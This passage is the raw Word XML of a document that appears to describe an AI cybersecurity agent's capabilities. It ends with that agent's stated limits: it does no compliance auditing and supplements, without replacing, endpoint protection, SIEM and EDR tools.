        <w:t xml:space="preserve">No compliance auditing: the agent does not perform formal compliance checks (PCI-DSS, HIPAA, SOC2), though its findings can inform compliance efforts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The agent is designed as a reconnaissance and analysis tool, not a replacement for endpoint protection, SIEM, or EDR solutions. It is best used alongside these tools to provide AI-powered investigation and analysis capabilities.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Cybersecurity Agent — Capabilities &amp; Checks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2026-07-06T15:35:29.707Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-06T15:35:29.707Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>